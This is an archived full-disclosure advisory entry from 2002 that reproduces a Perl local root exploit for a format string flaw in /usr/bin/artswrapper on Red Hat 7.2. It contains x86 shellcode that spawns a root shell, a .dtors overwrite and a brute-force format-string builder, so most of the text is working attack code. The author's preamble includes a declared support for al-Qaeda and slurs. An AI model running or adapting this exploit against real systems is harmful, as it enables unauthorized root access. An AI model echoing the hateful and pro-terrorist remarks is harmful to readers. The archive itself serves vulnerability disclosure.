LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT

2002-07-08T00:00:00
ID SECURITYVULNS:DOC:3179
Type securityvulns
Reporter Securityvulns
Modified 2002-07-08T00:00:00

Description

!/usr/bin/perl

fartsy.pl by kanix <kanix@0xfee1dead.net>

/usr/sbin/artswrapper <local format string exploit>

Tested on Red Hat Linux release 7.2 (Enigma)

Jul 6, 2002

"the secret to creativity is knowing how to hide your

sources."

- Albert Einstein

commentz, job offerz, flamez, etc. should be directed to my e-mail

address -- I WILL SCHOOL YOU ALL.

SCREW THE USA! FEAR THE POWER OF .NO !@#$%!

official supporter of the al-Qaeda Terrorist Network.

BURN, BABY, BURN!!!

I 0xc0ded this for fun and profit... and to get scene whorez. ;>

This code is far from special - my mother could have written it,

however, that is the extent of my ability.

I can code sploits, but I know nothing of UNC file sharing! I'm

still very 0x1337. I mean, I can code exploits, that's what makes

you a hacker!

SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,

there are enuff retardz in the hacker scene already (LIKE ME ;>)!

Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,

security.is, #hackphreak, teleh0r (fame seeking whore like

me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO

AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS,

BITCH!@#$%!)

kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!

kanix: can some1 pleeze tell me about DNS cache poisoning?

$kode = "\x31\xdb". # xor ebx, ebx "\xf7\xe3". # mul ebx "\xb0\x17". # mov al, 0x17 "\xcd\x80". # int 0x80 "\x31\xc0". # xor eax, eax "\x99". # cdq "\x52". # push edx "\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f "\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f "\x89\xe3". # mov ebx, esp "\x52". # push edx "\x53". # push ebx "\x89\xe1". # mov ecx, esp "\xb0\x0b". # mov al, 0x0b "\xcd\x80"; # int 0x80

$vuln = "/usr/bin/artswrapper"; $dtors = 0x8049a7c + 4;; # I overwrite .dtors! (patent pending)

printf("\n-- /usr/bin/artswrapper local format string exploit\n"); printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");

$ret_addr = 0xc0000000 - 4 - (length($vuln) + 1) - (length($kode) + 1) ;

undef(%ENV); $ENV{'1337'} = $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr); printf("bruteforcing distance (1 .. 300)\n"); sleep(2);

for (1 .. 300) { $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_); die("\x0a") if (system("$vuln -a $fmt_str")) =~ m/^(0|256|512|32512)$/; }

sub sw_fmtstr_create ($$$) { die("Incorrect number of arguments for sw_fmtstr_create") unless @_ == 3;

my &#40;$dest_addr, $ret_addr, $dist&#41; = @_;
my &#40;$word, $qword&#41; = &#40;2, 8&#41;;

$tmp1  = &#40;&#40;$ret_addr &gt;&gt; 16&#41; &amp; 0xffff&#41;;
$tmp2  = $ret_addr &amp; 0xffff;

if &#40;$tmp1 &lt; $tmp2&#41; {
    $high = $tmp1 - $qword;
    $low  = $tmp2 - $high - $qword;

    $dest_addr1 = pack&#40;&#39;L&#39;, $dest_addr + $word&#41;;
    $dest_addr2 = pack&#40;&#39;L&#39;, $dest_addr&#41;;
}
else {
    $high = $tmp2 - $qword;
    $low  = $tmp1 - $high - $qword;

    $dest_addr1 = pack&#40;&#39;L&#39;, $dest_addr&#41;;
    $dest_addr2 = pack&#40;&#39;L&#39;, $dest_addr + $word&#41;;
}

sprintf&#40;&quot;&#37;.4s&#37;.4s&#37;&#37;&#37;uu&#37;&#37;&#37;u&#92;$hn&#37;&#37;&#37;uu&#37;&#37;&#37;u&#92;$hn&quot;,
        $dest_addr1, $dest_addr2, $high, $dist,
        $low, $dist + 1&#41;;

}